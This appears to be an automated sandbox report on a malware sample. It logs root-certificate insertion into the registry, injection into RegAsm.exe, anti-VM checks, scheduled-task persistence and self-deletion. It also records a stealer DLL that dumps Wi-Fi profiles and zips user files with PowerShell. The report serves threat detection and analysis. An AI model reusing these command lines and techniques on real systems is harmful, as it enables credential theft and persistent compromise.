83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	propro.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	s7UKFsjOH4GYxoiVxdhmjI7j.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	s7UKFsjOH4GYxoiVxdhmjI7j.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	s7UKFsjOH4GYxoiVxdhmjI7j.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exechrosha.exeTraffic.exerundll32.exeRegAsm.exepropro.exepowershell.exefile300un.exejok.exepowershell.exepowershell.exepowershell.exelkLVHXsDUhAgSrtszIRwCQuF.exefx1YsP1qlDAnfY4TQQ5RyWVC.exepowershell.exepowershell.exepowershell.exefx1YsP1qlDAnfY4TQQ5RyWVC.exelkLVHXsDUhAgSrtszIRwCQuF.exe

pid	process
3172	4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exe
3172	4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exe
4260	chrosha.exe
4260	chrosha.exe
2752	Traffic.exe
2752	Traffic.exe
1064	rundll32.exe
1064	rundll32.exe
1064	rundll32.exe
1064	rundll32.exe
1064	rundll32.exe
1064	rundll32.exe
1904	RegAsm.exe
1904	RegAsm.exe
2676	propro.exe
2676	propro.exe
2676	propro.exe
2676	propro.exe
2676	propro.exe
2676	propro.exe
1064	rundll32.exe
1064	rundll32.exe
1064	rundll32.exe
1064	rundll32.exe
3828	powershell.exe
3828	powershell.exe
5036	file300un.exe
5036	file300un.exe
3828	powershell.exe
1904	RegAsm.exe
1904	RegAsm.exe
2392	jok.exe
2392	jok.exe
2392	jok.exe
2392	jok.exe
2940	powershell.exe
2940	powershell.exe
2392	jok.exe
2392	jok.exe
2848	powershell.exe
2848	powershell.exe
2940	powershell.exe
2848	powershell.exe
3516	powershell.exe
3516	powershell.exe
3516	powershell.exe
3572	lkLVHXsDUhAgSrtszIRwCQuF.exe
3572	lkLVHXsDUhAgSrtszIRwCQuF.exe
2876	fx1YsP1qlDAnfY4TQQ5RyWVC.exe
2876	fx1YsP1qlDAnfY4TQQ5RyWVC.exe
3508	powershell.exe
3508	powershell.exe
1852	powershell.exe
1852	powershell.exe
3508	powershell.exe
1852	powershell.exe
5736	powershell.exe
5736	powershell.exe
5736	powershell.exe
3960	fx1YsP1qlDAnfY4TQQ5RyWVC.exe
3960	fx1YsP1qlDAnfY4TQQ5RyWVC.exe
4284	lkLVHXsDUhAgSrtszIRwCQuF.exe
4284	lkLVHXsDUhAgSrtszIRwCQuF.exe
3960	fx1YsP1qlDAnfY4TQQ5RyWVC.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Traffic.exepropro.exepowershell.exefile300un.exeAddInProcess32.exeRegAsm.exepowershell.exejok.exepowershell.exepowershell.exeWMIC.exelkLVHXsDUhAgSrtszIRwCQuF.exefx1YsP1qlDAnfY4TQQ5RyWVC.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2752	Traffic.exe
Token: SeBackupPrivilege	2752	Traffic.exe
Token: SeSecurityPrivilege	2752	Traffic.exe
Token: SeSecurityPrivilege	2752	Traffic.exe
Token: SeSecurityPrivilege	2752	Traffic.exe
Token: SeSecurityPrivilege	2752	Traffic.exe
Token: SeDebugPrivilege	2676	propro.exe
Token: SeDebugPrivilege	3828	powershell.exe
Token: SeDebugPrivilege	5036	file300un.exe
Token: SeDebugPrivilege	4620	AddInProcess32.exe
Token: SeDebugPrivilege	760	RegAsm.exe
Token: SeDebugPrivilege	2940	powershell.exe
Token: SeDebugPrivilege	2392	jok.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	3516	powershell.exe
Token: SeIncreaseQuotaPrivilege	1044	WMIC.exe
Token: SeSecurityPrivilege	1044	WMIC.exe
Token: SeTakeOwnershipPrivilege	1044	WMIC.exe
Token: SeLoadDriverPrivilege	1044	WMIC.exe
Token: SeSystemProfilePrivilege	1044	WMIC.exe
Token: SeSystemtimePrivilege	1044	WMIC.exe
Token: SeProfSingleProcessPrivilege	1044	WMIC.exe
Token: SeIncBasePriorityPrivilege	1044	WMIC.exe
Token: SeCreatePagefilePrivilege	1044	WMIC.exe
Token: SeBackupPrivilege	1044	WMIC.exe
Token: SeRestorePrivilege	1044	WMIC.exe
Token: SeShutdownPrivilege	1044	WMIC.exe
Token: SeDebugPrivilege	1044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1044	WMIC.exe
Token: SeRemoteShutdownPrivilege	1044	WMIC.exe
Token: SeUndockPrivilege	1044	WMIC.exe
Token: SeManageVolumePrivilege	1044	WMIC.exe
Token: 33	1044	WMIC.exe
Token: 34	1044	WMIC.exe
Token: 35	1044	WMIC.exe
Token: 36	1044	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1044	WMIC.exe
Token: SeSecurityPrivilege	1044	WMIC.exe
Token: SeTakeOwnershipPrivilege	1044	WMIC.exe
Token: SeLoadDriverPrivilege	1044	WMIC.exe
Token: SeSystemProfilePrivilege	1044	WMIC.exe
Token: SeSystemtimePrivilege	1044	WMIC.exe
Token: SeProfSingleProcessPrivilege	1044	WMIC.exe
Token: SeIncBasePriorityPrivilege	1044	WMIC.exe
Token: SeCreatePagefilePrivilege	1044	WMIC.exe
Token: SeBackupPrivilege	1044	WMIC.exe
Token: SeRestorePrivilege	1044	WMIC.exe
Token: SeShutdownPrivilege	1044	WMIC.exe
Token: SeDebugPrivilege	1044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1044	WMIC.exe
Token: SeRemoteShutdownPrivilege	1044	WMIC.exe
Token: SeUndockPrivilege	1044	WMIC.exe
Token: SeManageVolumePrivilege	1044	WMIC.exe
Token: 33	1044	WMIC.exe
Token: 34	1044	WMIC.exe
Token: 35	1044	WMIC.exe
Token: 36	1044	WMIC.exe
Token: SeDebugPrivilege	3572	lkLVHXsDUhAgSrtszIRwCQuF.exe
Token: SeImpersonatePrivilege	3572	lkLVHXsDUhAgSrtszIRwCQuF.exe
Token: SeDebugPrivilege	2876	fx1YsP1qlDAnfY4TQQ5RyWVC.exe
Token: SeImpersonatePrivilege	2876	fx1YsP1qlDAnfY4TQQ5RyWVC.exe
Token: SeDebugPrivilege	3508	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	5736	powershell.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

u2fk.3.exe

pid process

2264 u2fk.3.exe
2264 u2fk.3.exe
2264 u2fk.3.exe
2264 u2fk.3.exe
2264 u2fk.3.exe
2264 u2fk.3.exe
2264 u2fk.3.exe
Suspicious use of SendNotifyMessage 7 IoCs

Processes:

u2fk.3.exe

pid process

2264 u2fk.3.exe
2264 u2fk.3.exe
2264 u2fk.3.exe
2264 u2fk.3.exe
2264 u2fk.3.exe
2264 u2fk.3.exe
2264 u2fk.3.exe

pid	process
2264	u2fk.3.exe
2264	u2fk.3.exe
2264	u2fk.3.exe
2264	u2fk.3.exe
2264	u2fk.3.exe
2264	u2fk.3.exe
2264	u2fk.3.exe

pid	process
2264	u2fk.3.exe
2264	u2fk.3.exe
2264	u2fk.3.exe
2264	u2fk.3.exe
2264	u2fk.3.exe
2264	u2fk.3.exe
2264	u2fk.3.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrosha.exeswiiiii.exealexxxxxxxx.exeRegAsm.exegold.exeNewB.exe070.exeis-NS945.tmp

description	pid	process	target process
PID 4260 wrote to memory of 2828	4260	chrosha.exe	swiiiii.exe
PID 4260 wrote to memory of 2828	4260	chrosha.exe	swiiiii.exe
PID 4260 wrote to memory of 2828	4260	chrosha.exe	swiiiii.exe
PID 2828 wrote to memory of 3048	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 3048	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 3048	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 1544	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 1544	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 1544	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 4480	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 4480	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 4480	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 4480	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 4480	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 4480	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 4480	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 4480	2828	swiiiii.exe	RegAsm.exe
PID 2828 wrote to memory of 4480	2828	swiiiii.exe	RegAsm.exe
PID 4260 wrote to memory of 980	4260	chrosha.exe	alexxxxxxxx.exe
PID 4260 wrote to memory of 980	4260	chrosha.exe	alexxxxxxxx.exe
PID 4260 wrote to memory of 980	4260	chrosha.exe	alexxxxxxxx.exe
PID 980 wrote to memory of 760	980	alexxxxxxxx.exe	RegAsm.exe
PID 980 wrote to memory of 760	980	alexxxxxxxx.exe	RegAsm.exe
PID 980 wrote to memory of 760	980	alexxxxxxxx.exe	RegAsm.exe
PID 980 wrote to memory of 760	980	alexxxxxxxx.exe	RegAsm.exe
PID 980 wrote to memory of 760	980	alexxxxxxxx.exe	RegAsm.exe
PID 980 wrote to memory of 760	980	alexxxxxxxx.exe	RegAsm.exe
PID 980 wrote to memory of 760	980	alexxxxxxxx.exe	RegAsm.exe
PID 980 wrote to memory of 760	980	alexxxxxxxx.exe	RegAsm.exe
PID 760 wrote to memory of 2752	760	RegAsm.exe	Traffic.exe
PID 760 wrote to memory of 2752	760	RegAsm.exe	Traffic.exe
PID 760 wrote to memory of 2676	760	RegAsm.exe	propro.exe
PID 760 wrote to memory of 2676	760	RegAsm.exe	propro.exe
PID 760 wrote to memory of 2676	760	RegAsm.exe	propro.exe
PID 4260 wrote to memory of 2644	4260	chrosha.exe	gold.exe
PID 4260 wrote to memory of 2644	4260	chrosha.exe	gold.exe
PID 4260 wrote to memory of 2644	4260	chrosha.exe	gold.exe
PID 2644 wrote to memory of 4592	2644	gold.exe	RegAsm.exe
PID 2644 wrote to memory of 4592	2644	gold.exe	RegAsm.exe
PID 2644 wrote to memory of 4592	2644	gold.exe	RegAsm.exe
PID 2644 wrote to memory of 4592	2644	gold.exe	RegAsm.exe
PID 2644 wrote to memory of 4592	2644	gold.exe	RegAsm.exe
PID 2644 wrote to memory of 4592	2644	gold.exe	RegAsm.exe
PID 2644 wrote to memory of 4592	2644	gold.exe	RegAsm.exe
PID 2644 wrote to memory of 4592	2644	gold.exe	RegAsm.exe
PID 4260 wrote to memory of 2016	4260	chrosha.exe	NewB.exe
PID 4260 wrote to memory of 2016	4260	chrosha.exe	NewB.exe
PID 4260 wrote to memory of 2016	4260	chrosha.exe	NewB.exe
PID 2016 wrote to memory of 2244	2016	NewB.exe	schtasks.exe
PID 2016 wrote to memory of 2244	2016	NewB.exe	schtasks.exe
PID 2016 wrote to memory of 2244	2016	NewB.exe	schtasks.exe
PID 4260 wrote to memory of 2392	4260	chrosha.exe	jok.exe
PID 4260 wrote to memory of 2392	4260	chrosha.exe	jok.exe
PID 4260 wrote to memory of 2392	4260	chrosha.exe	jok.exe
PID 4260 wrote to memory of 2236	4260	chrosha.exe	Conhost.exe
PID 4260 wrote to memory of 2236	4260	chrosha.exe	Conhost.exe
PID 4260 wrote to memory of 2236	4260	chrosha.exe	Conhost.exe
PID 2016 wrote to memory of 4596	2016	NewB.exe	070.exe
PID 2016 wrote to memory of 4596	2016	NewB.exe	070.exe
PID 2016 wrote to memory of 4596	2016	NewB.exe	070.exe
PID 4596 wrote to memory of 2716	4596	070.exe	is-NS945.tmp
PID 4596 wrote to memory of 2716	4596	070.exe	is-NS945.tmp
PID 4596 wrote to memory of 2716	4596	070.exe	is-NS945.tmp
PID 2716 wrote to memory of 2572	2716	is-NS945.tmp	Assistant_109.0.5097.45_Setup.exe_sfx.exe

C:\Users\Admin\AppData\Local\Temp\4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exe
"C:\Users\Admin\AppData\Local\Temp\4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3172

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4260
- C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
  "C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3048
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1544
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4480
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 920
    3⤵
    - Program crash
    PID:1480
- C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
  "C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:980
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:760
  - - C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2752
  - - C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2676
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
      4⤵
      PID:1880
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:732
- C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
  "C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4592
- C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
  "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:2244
- - C:\Users\Admin\AppData\Local\Temp\1000200001\070.exe
    "C:\Users\Admin\AppData\Local\Temp\1000200001\070.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4596
  - - C:\Users\Admin\AppData\Local\Temp\is-IRTHH.tmp\is-NS945.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-IRTHH.tmp\is-NS945.tmp" /SL4 $70084 "C:\Users\Admin\AppData\Local\Temp\1000200001\070.exe" 3710753 52224
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2716
    - - C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe
        
        "C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe" -i
        5⤵
        Executes dropped EXE
        
        PID:2572
    - - C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe
        
        "C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe" -s
        5⤵
        Executes dropped EXE
        
        PID:484
- C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
  "C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2392
- C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
  "C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2236
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1904
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
  2⤵
  - Loads dropped DLL
  PID:3668
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:1064
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:2504
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\718508534211_Desktop.zip' -CompressionLevel Optimal
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3828
- C:\Users\Admin\AppData\Local\Temp\1000173001\Startup.exe
  "C:\Users\Admin\AppData\Local\Temp\1000173001\Startup.exe"
  2⤵
  - Executes dropped EXE
  PID:2084
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ipconfig /release
    3⤵
    PID:1724
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:1544
- C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
  "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5036
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4620
  - - C:\Users\Admin\Pictures\5BYixpIR6qLhdtBI5sLOjhac.exe
      "C:\Users\Admin\Pictures\5BYixpIR6qLhdtBI5sLOjhac.exe"
      4⤵
      Executes dropped EXE
      PID:3152
    - - C:\Users\Admin\AppData\Local\Temp\u2fk.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2fk.0.exe"
        5⤵
        Executes dropped EXE
        
        PID:1448
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1448 -s 1096
        6⤵
        Program crash
        
        PID:1384
